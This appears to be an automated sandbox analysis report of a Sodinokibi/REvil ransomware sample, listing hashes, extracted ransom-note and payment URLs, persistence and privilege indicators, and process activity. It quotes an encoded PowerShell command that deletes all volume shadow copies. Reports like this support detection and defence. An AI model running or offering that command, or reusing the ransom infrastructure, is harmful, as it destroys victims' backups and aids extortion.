Analysis
-
max time kernel
99s -
max time network
99s -
platform
windows10_x64 -
resource
win10 -
submitted
29-06-2020 07:31
Static task
static1
Behavioral task
behavioral1
Sample
b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
Resource
win7v200430
Behavioral task
behavioral2
Sample
b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
Resource
win10
General
-
Target
b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe
-
Size
212KB
-
MD5
c283e5ec517605b6226c29f96f6d1d28
-
SHA1
43caef6a20ab9e045d76f8bf3e4e96d622f2a6eb
-
SHA256
b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb
-
SHA512
8a72a611925f7e504ebde23dba0f23f1cb30613bc1c3f6e36dfa3c8e954e152054a154ad3cc5eaeb4861e776135daa77ce19ebc0b00813d83298fd01ca579955
Malware Config
Extracted
C:\60k1e-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/160F183BD6FB5CAB
http://decryptor.cc/160F183BD6FB5CAB
Signatures
-
Enumerates connected drives 3 TTPs
-
Drops file in Program Files directory 27 IoCs
Processes:
b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exedescription ioc process File opened for modification \??\c:\program files\InitializePop.vbe b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\RemoveComplete.xsl b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\WaitGroup.jpeg b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\TraceConvert.mpg b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\PublishClear.cr2 b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File created \??\c:\program files (x86)\60k1e-readme.txt b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\ExitMeasure.pot b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\ImportRepair.m1v b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\ResolveAdd.wmx b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\ConnectDisable.docx b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\PushTest.reg b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\UnlockComplete.avi b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File created \??\c:\program files\60k1e-readme.txt b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\ImportUninstall.ppsx b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\MergeEnter.htm b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\ReadRedo.mhtml b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\SuspendProtect.ttf b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\UnpublishRevoke.DVR-MS b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\GrantBlock.pptx b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\ImportLimit.vstm b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\PopDebug.rar b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\RestoreSkip.tiff b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\ResumeGet.csv b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\StepUse.fon b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\StopUpdate.xlsx b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\UnregisterCompress.xps b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe File opened for modification \??\c:\program files\CompleteWatch.mid b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2066881839-3229799743-3576549721-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\eg751ha03cg72.bmp" b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe -
Adds Run entry to start application 2 TTPs 2 IoCs
Processes:
b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exedescription ioc process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\tQZ5HNPIrG = "C:\\Users\\Admin\\AppData\\Local\\Temp\\b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe" b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe -
Suspicious use of AdjustPrivilegeToken 6 IoCs
Processes:
b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 2460 b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe Token: SeDebugPrivilege 4032 powershell.exe Token: SeBackupPrivilege 688 vssvc.exe Token: SeRestorePrivilege 688 vssvc.exe Token: SeAuditPrivilege 688 vssvc.exe Token: SeTakeOwnershipPrivilege 2460 b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exepowershell.exepid process 2460 b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe 2460 b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe 4032 powershell.exe 4032 powershell.exe 4032 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
Processes:
b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exedescription pid process target process PID 2460 wrote to memory of 4032 2460 b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe powershell.exe PID 2460 wrote to memory of 4032 2460 b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe powershell.exe -
Modifies service 2 TTPs 5 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe"C:\Users\Admin\AppData\Local\Temp\b433aaa86cc70ce6c60798f07fa013f4712947b32b6692bc08e1832dc17f90fb.exe"1⤵
- Drops file in Program Files directory
- Sets desktop wallpaper using registry
- Adds Run entry to start application
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2460 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==2⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:4032
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:3332
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:688